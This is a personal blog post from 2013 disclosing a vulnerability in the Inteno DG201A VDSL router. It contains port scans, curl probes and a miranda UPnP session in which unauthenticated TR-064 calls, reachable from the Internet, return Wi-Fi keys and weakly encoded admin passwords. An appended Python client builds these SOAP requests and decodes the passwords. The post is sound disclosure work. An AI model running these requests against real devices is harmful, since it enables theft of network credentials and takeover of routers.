
Hacking Inteno DG201A

07 Nov 2013 . category: Hacking .
#hacking #reverseengineering #vulnerability

Raw notes

I had been running my VDSL2 box happily in bridge mode, thinking there was not much risk because the box should only be forwarding packets to my firewall. After making some changes to the VDSL box I realized that, for some strange reason, it still takes an IP address from the Internet even though it should be in bridged mode.

That means I need to check how secure it is.

Information

nmap from LAN:

$ nmap  -v -sT -p 1-65535 -A 192.168.1.1
...
Nmap scan report for 192.168.1.1
Host is up (0.019s latency).
Not shown: 65525 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  tcpwrapped
22/tcp    open  ssh         Dropbear sshd 0.46 (protocol 2.0)
|_ssh-hostkey: 1040 7c:17:56:30:1e:48:96:50:8d:eb:ad:64:c9:93:ed:b4 (RSA)
23/tcp    open  telnet?
80/tcp    open  http        micro_httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 501)
|_http-title: Inteno Residential Gateway
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
1780/tcp  open  tcpwrapped
30005/tcp open  unknown
44401/tcp open  unknown
49431/tcp open  upnp        Belkin/Linksys wireless router UPnP (Linux 2.4; UPnP 1.0; BRCM400 1.0)
Service Info: OS: Linux; Device: router

Host script results:
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery: 
|   OS: Unix (Samba 3.3.4)
|   Name: Unknown\Unknown
|_  System time: 2013-11-07 23:06:46 UTC+0

From the Internet

Nmap scan report for x x
Host is up (0.0097s latency).
Not shown: 55588 filtered ports, 9943 closed ports
PORT      STATE SERVICE    VERSION
21/tcp    open  tcpwrapped
|_ftp-anon: ERROR: Script execution failed (use -d to debug)
22/tcp    open  tcpwrapped
23/tcp    open  telnet?
80/tcp    open  http?
30005/tcp open  unknown
49431/tcp open  unknown

Even though ports 21, 22, 23 and 80 appear open from the Internet, nothing is actually served on them there: nmap reports them as tcpwrapped, meaning the TCP handshake completes but the connection is closed before any data is exchanged. Ports 30005 and 49431, however, do answer from the Internet.

netstat

# ./netstat     

Proto   Local Address           Local Port      Remote Address          Remote Port     State           PID             Process
----------------------------------------------------------------------------------------------------------------------------------------------------
tcp     213.216.244.4           5060            0.0.0.0                 0               LISTEN          1230            /bin/vodsl -m 0 
tcp     0.0.0.0                 139             0.0.0.0                 0               LISTEN          1197            /bin/smbd -D 
tcp     0.0.0.0                 44401           0.0.0.0                 0               LISTEN          241             /bin/smd 
tcp     192.168.1.1             1780            0.0.0.0                 0               LISTEN          965             /bin/bcmupnp -D 
tcp     0.0.0.0                 30005           0.0.0.0                 0               LISTEN          241             /bin/smd 
tcp     0.0.0.0                 49431           0.0.0.0                 0               LISTEN          849             /bin/tr64c -m 0 
tcp     0.0.0.0                 445             0.0.0.0                 0               LISTEN          1197            /bin/smbd -D 
udp     127.0.0.1               40100           0.0.0.0                 0               LISTEN          965             /bin/bcmupnp -D 
udp     0.0.0.0                 53              0.0.0.0                 0               LISTEN          255             /bin/dnsproxy 
udp     213.216.244.4           5060            0.0.0.0                 0               LISTEN          1230            /bin/vodsl -m 0 
udp     0.0.0.0                 50000           0.0.0.0                 0               LISTEN          973             /bin/eapd 
udp     0.0.0.0                 40920           0.0.0.0                 0               LISTEN          255             /bin/dnsproxy 
udp     0.0.0.0                 35943           0.0.0.0                 0               LISTEN          253             /bin/busybox -n -C -l 7 -R 10.0.0.1:514 -r 7 
udp     0.0.0.0                 5098            0.0.0.0                 0               LISTEN          850             /bin/dsldiagd 
udp     0.0.0.0                 5099            0.0.0.0                 0               LISTEN          850             /bin/dsldiagd 
udp     0.0.0.0                 1900            0.0.0.0                 0               LISTEN          965             /bin/bcmupnp -D 
udp     0.0.0.0                 1900            0.0.0.0                 0               LISTEN          849             /bin/tr64c -m 0 
udp     0.0.0.0                 5100            0.0.0.0                 0               LISTEN          850             /bin/dsldiagd 
udp     0.0.0.0                 38000           0.0.0.0                 0               LISTEN          973             /bin/eapd 
udp     0.0.0.0                 50032           0.0.0.0                 0               LISTEN          823             /bin/wlevt 

Port 30005

Some kind of SOAP interface? It is served by smd and answers with an HTTP Digest challenge (realm IgdAuthentication), which matches the TR-069 connection-request listener of Broadcom's CPE stack; most likely this is where the operator's ACS knocks to make the box call home. Unlike the UPnP service on 49431, it at least asks for credentials.

$ curl -v 213.216.244.4:30005
* About to connect() to 213.216.244.4 port 30005 (#0)
*   Trying 213.216.244.4...
* connected
* Connected to 213.216.244.4 (213.216.244.4) port 30005 (#0)
> GET / HTTP/1.1
> User-Agent: curl/7.26.0
> Host: 213.216.244.4:30005
> Accept: */*
> 
< HTTP/1.1 401 Unauthorized
< Content-Length: 0
< WWW-Authenticate: Digest realm="IgdAuthentication", domain="/", nonce="YzhjYzJkOGM6MzYzOTMwZjA6NjViZDJmMTQ=", qop="auth", algorithm=MD5, opaque="5ccc09c403ebaf9f0171e9517f40e41"
< 
* Connection #0 to host 213.216.244.4 left intact

Port 49431

This UPnP service is reachable from the Internet as well, not only from the LAN.

curl -v http://192.168.1.1:49431/devicedesc.xml
* About to connect() to 192.168.1.1 port 49431 (#0)
*   Trying 192.168.1.1... connected
* Connected to 192.168.1.1 (192.168.1.1) port 49431 (#0)
> GET /devicedesc.xml HTTP/1.1
> User-Agent: curl/7.21.4 (universal-apple-darwin11.0) libcurl/7.21.4 OpenSSL/0.9.8x zlib/1.2.5
> Host: 192.168.1.1:49431
> Accept: */*
> 
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< SERVER: LINUX/2.4 UPnP/1.0 BRCM400/1.0
< DATE: Fri, 08 Nov 2013 00:38:54 GMT
< CONTENT-TYPE: application/octet-stream
< Cache-Control: max-age=1
< PRAGMA: no-cache
< Connection: Close
< 
<?xml version="1.0"?>
<root xmlns="urn:dslforum-org:device-1-0">
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<URLBase>http://192.168.1.1:49431/</URLBase>
<device>
<deviceType>urn:dslforum-org:device:InternetGatewayDevice:1</deviceType>
<presentationURL>http://192.168.1.1:80/</presentationURL>
<friendlyName>Broadcom ADSL Router</friendlyName>
<manufacturer>Broadcom</manufacturer>
<manufacturerURL>http://www.broadcom.com/</manufacturerURL>
<modelDescription>Broadcom single-chip ADSL router</modelDescription>
<modelName>BRCM963xx</modelName>
<modelNumber>1.0</modelNumber>
<modelURL>http://www.broadcom.com/</modelURL>
<serialNumber>D20124H126013910</serialNumber>
<UDN>uuid:10f89122-4807-11e3-8730-0022071b7f82</UDN>
<serviceList>
<service>
<serviceType>urn:dslforum-org:service:IPPingDiagnostics:1</serviceType>
<serviceId>urn:dslforum-org:serviceId:IPPingDiagnostics1</serviceId>
<controlURL>/uuid:10f89122-4807-11e3-8730-0022071b7f82/IPPingDiagnostics:1</controlURL>
<eventSubURL>/uuid:10f89122-4807-11e3-8730-0022071b7f82/IPPingDiagnostics:1</eventSubURL>
<SCPDURL>/dynsvc/IPPingDiagnostics:1.xml</SCPDURL>
...

Vulnerability in UPnP service

After a lot of searching I found a more hacker-friendly tool for testing UPnP and used miranda: Miranda-upnp

The process name of this service is tr64c, and the urn:dslforum-org namespaces in its device description identify it as TR-064, the DSL Forum's protocol for LAN-side CPE configuration, so most likely it is meant for the operator to do some remote management. I am not 100% sure what the purpose of this service is, but you can get some really nasty information out of the device, and you can even change e.g. the WLAN (Wi-Fi) configuration with it.

Here is a sample:

$ python miranda.py -s upnp-inteno.mir 

Miranda v1.3
The interactive UPnP client
Craig Heffner, http://www.devttys0.com


Host data restored:

        [0] 10.0.2.187:8888
        [1] 192.168.1.1:49431
        [2] 192.168.1.1:49431
        [3] 213.216.x.x:49431
        [4] 85.131.x.x:49431

upnp> host get 3

Requesting device and service info for 213.216.x.x:49431 (this could take a few seconds)...

Host data enumeration complete!

upnp> host send 3 LANDevice WLANConfiguration GetSecurityKeys

NewWEPKey3 : 1234567890123
NewWEPKey2 : 1234567890123
NewWEPKey1 : 1234567890123
NewWEPKey0 : 1234567890123
NewKeyPassphrase : 
NewPreSharedKey : 12345678
upnp> host send 3 InternetGatewayDevice DeviceConfig GetConfiguration

NewConfigFile : <?xml version="1.0"?>
<DslCpeConfig version="3.0">
  <InternetGatewayDevice>
    <LANDeviceNumberOfEntries>1</LANDeviceNumberOfEntries>
    <WANDeviceNumberOfEntries>3</WANDeviceNumberOfEntries>
    <DeviceInfo>
      <ProvisioningCode>12345</ProvisioningCode>
      <FirstUseDate>2012-04-11T14:46:01+00:00</FirstUseDate>
      <VendorConfigFileNumberOfEntries>0</VendorConfigFileNumberOfEntries>
    </DeviceInfo>
    <X_BROADCOM_COM_SyslogCfg>
      <Status>Enabled</Status>
      <Option>local buffer and remote</Option>
      <LocalDisplayLevel>Debug</LocalDisplayLevel>
      <ServerIPAddress>10.0.0.1</ServerIPAddress>
    </X_BROADCOM_COM_SyslogCfg>
    <X_BROADCOM_COM_LoginCfg>
      <SupportPassword>ZG5hcjNzY3VlMTEyAA==</SupportPassword>
      <UserPassword>dXNlcgo=</UserPassword>
    </X_BROADCOM_COM_LoginCfg>
...

As you can see, you can get the WLAN keys, the configuration including the support and user passwords (only base64-encoded, not hashed) and much more, without any authentication. This is sad.

You cannot disable this service, and it is exposed directly to the Internet even when the device is in bridge mode.
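What miranda does in the session above, written out as an added example (not part of the original post, and not miranda's, Inteno's or Broadcom's code): a small TR-064 control client in Python. It maps each serviceType in devicedesc.xml to its controlURL, builds the SOAP request for an action such as GetSecurityKeys, and parses the output arguments back. The device description, SOAP response and config fragment embedded in it are constructed (abridged from the output above, with an assumed LANDevice/WLANConfiguration control URL and a made-up support password), so the parsing runs offline; only send_action() talks to a device, and it should only be pointed at your own.

```python
"""Minimal TR-064 (UPnP, urn:dslforum-org) control client, added for this post.
Not Inteno's, Broadcom's or miranda's code. Does what miranda's "host get" and
"host send" do: map serviceType -> controlURL from devicedesc.xml, POST a SOAP
action, read the output arguments. Sample data is constructed so it runs offline;
only send_action() touches the network."""
import base64
import re
import urllib.request
import xml.etree.ElementTree as ET

DEVICE_NS = "urn:dslforum-org:device-1-0"
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WLAN_SVC = "urn:dslforum-org:service:WLANConfiguration:1"

# Constructed, abridged device description. The LANDevice/WLANConfiguration
# entry and its control URL are an assumption; the page only shows IPPingDiagnostics.
SAMPLE_DEVICEDESC = """<?xml version="1.0"?>
<root xmlns="urn:dslforum-org:device-1-0"><device>
<deviceType>urn:dslforum-org:device:InternetGatewayDevice:1</deviceType>
<UDN>uuid:10f89122-4807-11e3-8730-0022071b7f82</UDN>
<serviceList><service>
<serviceType>urn:dslforum-org:service:IPPingDiagnostics:1</serviceType>
<controlURL>/uuid:10f89122-4807-11e3-8730-0022071b7f82/IPPingDiagnostics:1</controlURL>
</service></serviceList>
<deviceList><device><deviceType>urn:dslforum-org:device:LANDevice:1</deviceType>
<serviceList><service><serviceType>urn:dslforum-org:service:WLANConfiguration:1</serviceType>
<controlURL>/uuid:10f89122-4807-11e3-8730-0022071b7f82/WLANConfiguration:1</controlURL>
</service></serviceList></device></deviceList></device></root>"""

# Constructed SOAP response carrying the values the post got back from the box.
SAMPLE_GETSECURITYKEYS_RESPONSE = """<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>
<u:GetSecurityKeysResponse xmlns:u="urn:dslforum-org:service:WLANConfiguration:1">
<NewWEPKey0>1234567890123</NewWEPKey0><NewKeyPassphrase></NewKeyPassphrase>
<NewPreSharedKey>12345678</NewPreSharedKey></u:GetSecurityKeysResponse></s:Body></s:Envelope>"""

# Constructed fragment in the shape of the dumped DslCpeConfig (support password made up).
SAMPLE_CONFIG = """<X_BROADCOM_COM_LoginCfg><SupportPassword>czNjcmV0AA==</SupportPassword>
<UserPassword>dXNlcgo=</UserPassword></X_BROADCOM_COM_LoginCfg>"""


def find_services(devicedesc_xml):
    """Map serviceType -> controlURL for every <service>, nested devices included."""
    services = {}
    for svc in ET.fromstring(devicedesc_xml).iter("{%s}service" % DEVICE_NS):
        stype = svc.findtext("{%s}serviceType" % DEVICE_NS)
        ctrl = svc.findtext("{%s}controlURL" % DEVICE_NS)
        if stype and ctrl:
            services[stype] = ctrl
    return services


def build_soap_request(service_type, action, args=None):
    """Return (headers, body) for a UPnP control request. Note: no credential anywhere."""
    arg_xml = "".join("<%s>%s</%s>" % (k, v, k) for k, v in (args or {}).items())
    body = ('<?xml version="1.0" encoding="utf-8"?>'
            '<s:Envelope xmlns:s="%s" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
            '<s:Body><u:%s xmlns:u="%s">%s</u:%s></s:Body></s:Envelope>'
            % (SOAP_NS, action, service_type, arg_xml, action))
    headers = {"Content-Type": 'text/xml; charset="utf-8"',
               "SOAPAction": '"%s#%s"' % (service_type, action)}
    return headers, body


def parse_soap_response(response_xml):
    """Return the output arguments of a SOAP response as {name: text}; raise on a Fault."""
    body = ET.fromstring(response_xml).find("{%s}Body" % SOAP_NS)
    if body is None or len(body) == 0:
        raise ValueError("no SOAP body")
    resp = body[0]
    if resp.tag.endswith("}Fault"):
        raise RuntimeError(ET.tostring(resp, encoding="unicode"))
    return {child.tag.split("}")[-1]: (child.text or "") for child in resp}


def send_action(base_url, control_url, service_type, action, args=None, timeout=10):
    """POST one action to a live device (e.g. http://192.168.1.1:49431) and return its output."""
    headers, body = build_soap_request(service_type, action, args)
    req = urllib.request.Request(base_url.rstrip("/") + control_url, data=body.encode("utf-8"),
                                 headers=headers, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return parse_soap_response(resp.read().decode("utf-8", "replace"))


def decode_login_cfg(config_xml):
    """X_BROADCOM_COM_LoginCfg passwords in the dumped config are base64, not hashed."""
    out = {}
    for tag in ("SupportPassword", "UserPassword"):
        m = re.search(r"<%s>([^<]*)</%s>" % (tag, tag), config_xml)
        if m:
            raw = base64.b64decode(m.group(1))
            out[tag] = raw.decode("latin-1").rstrip("\x00\n")
    return out


if __name__ == "__main__":  # offline walk-through; for a live box call send_action() yourself
    print(find_services(SAMPLE_DEVICEDESC)[WLAN_SVC])
    print(parse_soap_response(SAMPLE_GETSECURITYKEYS_RESPONSE))
    print(decode_login_cfg(SAMPLE_CONFIG))
```

Note what is absent: build_soap_request() carries no credential at all; the control URL plus a SOAPAction header is everything the device asks for, which is exactly why miranda can pull the keys out from the WAN side. decode_login_cfg() makes the point about the dumped config: base64 is an encoding, not protection.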

Update


Me

Feel free to contact me for more info or just to give feedback. e-mail: mikko.kenttala(ä)gmail.com IRC: turmio@IRCnet